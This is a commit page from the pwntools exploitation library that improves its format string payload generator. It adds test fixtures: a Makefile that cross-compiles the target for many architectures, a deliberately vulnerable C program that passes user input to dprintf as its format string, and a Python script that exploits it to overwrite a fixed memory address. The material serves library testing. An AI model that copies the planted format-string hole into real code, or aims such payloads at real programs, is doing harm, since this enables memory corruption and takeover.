Skip to content
Permalink
Browse files

Improve format string generator (#1216)

* feat(fmtstr): place pointers after format operations

This means that the format string can now also work in certain
cases even if the pointers contain null bytes.

That's especially important on 64 bit where most pointers contain null bytes.

* fix(fmtstr): more stuff

* feat(fmtstr): optimize

* perf(fmtstr): make sorting run in reasonable time (not perfect yet)

* perf(fmtstr): be faster

* style(fmtstr): more docs, some cleanup

* fix(fmtstr): small fixes + more docs

* style(fmtstr): cleanup small style issues

* fix(fmtstr): fix handling of szmax in merge_atoms_overlapping

* fix(fmtstr): fix Atom __getitem__ for out-of-bounds index

* refactor(fmtstr): docs and cleaner code

* fix(fmtstr): small test/doc fixes

* tests(fmtstr): add example as tests for other arches

* doc(fmtstr): more docstrings

* fix(fmtstr): fix cyclic_find warnings

* refactor(fmtstr): remove another nested function

* tests(fmtstr): fix doctest output for wrong arch

* style(fmtstr): remove unused imports

* tests(fmtstr): add binaries for tests
  • Loading branch information...
bennofs authored and Arusekk committed Sep 24, 2019
1 parent 138fecf commit d2b9e48cf032df7cd292e78dbd192f57e97f0cd4
@@ -0,0 +1,51 @@
CFLAGS := -Wno-unused-result -Wno-format-security
TARGETS := printf.mips printf.mips64 printf.mipsel printf.mips64el printf.arm printf.aarch64 \
printf.ppc printf.ppc64 printf.sparc64 printf.native printf.native32

.PHONY: run
run: all
./exploit.py

.PHONY: all
all: $(TARGETS)

.PHONY: clean
clean:
rm -f $(TARGETS)

# mips variants
%.mips: %.c
mips-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mipsel: %.c
mipsel-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mips64: %.c
mips64-linux-gnuabi64-gcc $(CFLAGS) -static -Os -o "$@" $^
%.mips64el: %.c
mips64el-linux-gnuabi64-gcc $(CFLAGS) -static -Os -o "$@" $^

# arm variants
%.arm: %.c
arm-linux-gnueabi-gcc $(CFLAGS) -static -Os -o "$@" $^
%.aarch64: %.c
aarch64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# ppc variants
%.ppc: %.c
powerpc-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^
%.ppc64: %.c
powerpc64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# sparc variants
%.sparc64: %.c
sparc64-linux-gnu-gcc $(CFLAGS) -static -Os -o "$@" $^

# native variants
%.native: %.c
gcc $(CFLAGS) -o "$@" $^
%.native32: %.c
i686-linux-gnu-gcc $(CFLAGS) -o "$@" $^

# install deps on ubuntu xenial
.PHONY: install-apt
install-apt:
apt-get install -y make gcc-mips64el-linux-gnuabi64 gcc-sparc64-linux-gnu gcc-powerpc64-linux-gnu gcc-powerpc-linux-gnu gcc-arm-linux-gnueabi gcc-aarch64-linux-gnu gcc-mips64-linux-gnuabi64 gcc-mipsel-linux-gnu gcc-mips64el-linux-gnuabi64 gcc-mips-linux-gnu gcc-i686-linux-gnu gcc
@@ -0,0 +1,39 @@
#!/usr/bin/env python2
from pwn import *

@context.quiet
def exec_fmt(payload):
p = context.binary.process()
p.sendline(payload)
return p.recvall()

def exploit(binary):
context.binary = ELF(binary)
autofmt = FmtStr(exec_fmt)
offset = autofmt.offset
with context.binary.process() as p:
addr = unpack(p.recv(context.bytes))
payload = fmtstr_payload(offset, {addr: p32(0x1337babe)})
p.sendline(payload)
p.recvuntil("DONE")
print hex(u32(p.recv(4)))

binaries = [
"printf.mips",
"printf.mips64",
"printf.mipsel",
"printf.mips64el",
"printf.native",
"printf.native32",
"printf.ppc",
"printf.ppc64",
"printf.sparc64",
"printf.arm",
"printf.aarch64",
]

if len(sys.argv) > 1:
binaries = sys.argv[1:]

for binary in binaries:
exploit(binary)
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,29 @@
#ifdef _FORTIFY_SOURCE
#undef _FORTIFY_SOURCE
#endif
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/mman.h>
#define MEMORY_ADDRESS ((void*)0x11110000)
#define MEMORY_SIZE 1024
#define TARGET ((int *) 0x11110100)
int main(int argc, char const *argv[])
{
char buff[1024];
void *ptr = NULL;
int *my_var = TARGET;
ptr = mmap(MEMORY_ADDRESS, MEMORY_SIZE, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
if(ptr != MEMORY_ADDRESS)
{
perror("mmap");
return EXIT_FAILURE;
}
*my_var = 0x41414141;
write(1, &my_var, sizeof(int *));
scanf("%s", buff);
dprintf(2, buff);
write(1, "DONE", 4);
write(1, my_var, sizeof(int));
return 0;
}
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.

0 comments on commit d2b9e48

Please sign in to comment.
You can’t perform that action at this time.